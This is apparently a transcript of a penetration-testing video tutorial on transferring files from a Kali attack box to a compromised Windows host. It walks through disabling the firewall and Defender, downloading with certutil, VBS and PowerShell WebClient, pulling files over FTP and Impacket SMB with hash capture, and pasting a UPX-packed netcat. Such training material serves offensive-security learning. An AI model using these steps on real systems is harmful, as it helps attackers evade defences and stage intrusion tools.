Hey, what's up fellas? Welcome back to the channel, and in this video we're going to check out different ways to transfer files to Windows targets for post-exploitation. Here I have a netcast session into a Windows target. 136 is going to be my Kali attack box, and 135 is going to be the Windows host. In order to avoid any issues, I'll be using Powershell to disable the firewall on target, because obviously that would get in the way if we were trying to transfer enumeration scripts or malicious files. We can set net firewall profile enable to false, and what that's going to do, it's going to disable the firewall on the Windows machine. After that is done, one extra step would be to disable real-time monitoring, and again we can do this by leveraging PowerShell. With set MP preference disable real-time monitoring and set that to true. And here we go. All right, perfect. So once that's done, we can exit PowerShell and back into original shell. So one thing you need to keep in consideration while transferring files to target is that you need to find a directory where you have writing capabilities, and normally that would be Windows temp on Windows targets and temp in Linux. So from our Kali attack box, we can start a Python server which will function as a springboard for our file transfers. We can do Python 3-m HTTP server on port 8000. And now we can get started with Certutil. Now, Certutil is available on most modern Windows instances. We can echo a test, so we can echo the Certutil is an awesome tool, and we echo that into test1.txt. Cat, let's check it. Perfect. So now we're serving this text file on port 8000 on Kali. So on the other machine, we can do certutil-url cache-f to specify the file http 192.168.12.136 on port 8000. The file we need is test1.txt. And one thing you have to keep in mind is that you need to specify an out file, which is test1.txt. Here you go. You see that we have a 200, so we got a hit. If we type this test1.txt, we have this Certutil is an awesome tool. Perfect. So we're going to delete it now. So the next technique we're going to be taking a look at is going to be using Visual Basic. So it's called VBS script, which might come handy for older systems, say XP or Windows 2003, where PowerShell is not available. What we can do is basically we can copy the script and paste it directly into our target shell, and that is going to redirect the output into a wget.vbs script, which we can then leverage to download our files. So here from Kali, we're going to echo another test. We can call it test2. This VBS is going to be a long command. And here from Windows, this Windows shell, we can just straight up paste the command we just copied. So we just right click, paste it, and boom. As you can see here, we have this wget.vbs. What we can do at this point is we can type cscript wget.vbs. Then we're going to need to specify the source of these files, which again is our Kali attack box 192.168.12.136 8000, and is test2.txt. Again, we need to specify an out file, which we're going to call test2.txt. Again, we run it, and boom, we get another 200, which means the transfer is being successful. Now we type that, and oh wait, I didn't get it. I made a mistake. So type test2.txt, and there you go. Perfect. Now, moving on to the next one, I'm going to clear the terminal, and we're going to be doing PowerShell. we're going to echo PowerShell is powerful into this test3.txt. Let's cat it, and there you go. Now the syntax for PowerShell is a bit long. We have this PowerShell.exe, new object, system.net.web client, download file. Then we have the source, which is our Kali tech box, and then we have this test3.txt. Once we have it, we can run it, and again we have this 200, so we have transferred this file successfully. Let's type it out. Type test3.txt. PowerShell is powerful. Boom. There you go. All right. So now we're going to kill this Python server and start a PyFTPD lib to leverage FTP for file transfers. This is especially useful considering that all Windows systems come with a default FTP client install, so FTP is almost always available and is a natural choice to get files during post-exploitation. So we're going to start a Python FTP server on port 21. We can echo a test4. Now from our Windows target, we're going to cat it. FTP is always available in Windows targets. Now from Windows, we can just do FTP, our Kali IP address, which is 12.136. And at this point, we can authenticate as an anonymous user. So just anonymous and just type whatever you want. Just type anonymous. And once we're in, we can grab all the files that we need that are sourced on port 21 from our Kali attack box. So we can get test4.txt, we can type it, let's test it, and there you go. Now let's kill the FTP server again for a moment and take a look at Impacket. Now Impacket is definitely one of my favorite tools to transfer files into a Windows target. Basically what it does is that it spins up a mock Samba server on Kali. Using this smb server.py module, we can echo a test, and we can do Python 3 user share Python 3 Impacket example smb server.py. We can specify the name of the share we want to create. In this case is just Redcliffe. And then you can see here there is a dot, which indicates that we're serving files from the current directory. We let it run. And from Windows, what we can do is we can just connect back to our Kali SMB server and copy whatever file we need. So we just do copy the Kali IP address, 136, the share, which is Redcliffe, test5.txt, hit it. Here you can see that not only we get the file, but we also grab the hashes for the user, and we're going to look at that more closely in a future video, perhaps. So now we can type test5.txt, and here we have it. Impacket is the shiznit. Now let's delete this test5 before we move ahead. So let's delete test5.txt. And let's clear the terminal. So the first thing we need to do at this point is grab a copy of netcat.exe into the current directory, and we're going to use exe to x to do this. Now here we have it, netcat.exe. Before we transfer the file, it's a good idea to try and compress it. There is a tool on Kali which comes pre-installed. It's called UPX, and we can leverage that. We can compress netcat. So as you can see here, it's been compressed at a ratio of 50%, so it's 50% smaller. At this point, we can use exe to x to encode the executable file into ASCII text format. And as you can see, we've been successful with that. We can call it netcat.command. And the result of that can be transferred to your target machine. So you have this netcat.command. Let's just basically copy this whole thing and paste it directly into our target. So we cat it, cat netcat.command. It's going to be big ass command right here. Let's go to the top, copy it, right click. So I just basically just paste this whole thing directly into our target. Right. And as you can see now, if we do dirt, we have this netcat.exe. It has recreated a working version of netcat that we can later use to transfer files. Now, let's start a Python server here for the last time. This last technique is going to be an HTTP transfer and assumes that you have access to a Windows GUI, which is most likely not the case. But if that happens, there's a very simple way to transfer files, which is to spin up a Python server on whatever port you decide. We're going to choose 8000 here. And then what we're going to do is we're going to echo another test. And we can navigate to our Windows target. So we have to check out the GUI. Let's start the server first. And here we just open up a browser tab on Edge. And we can just navigate to our Kali IP address, which is 136 on port 8000. As you can see here, all of the other files that we just transferred are available. This is not likely again to be the case because like access to a GUI is very unlikely, but still something that just an extra technique. So here's a recap of all the techniques we have used. I hope you guys have enjoyed it, and as usual, let me know what you think down below in the comment section. And see you in the next.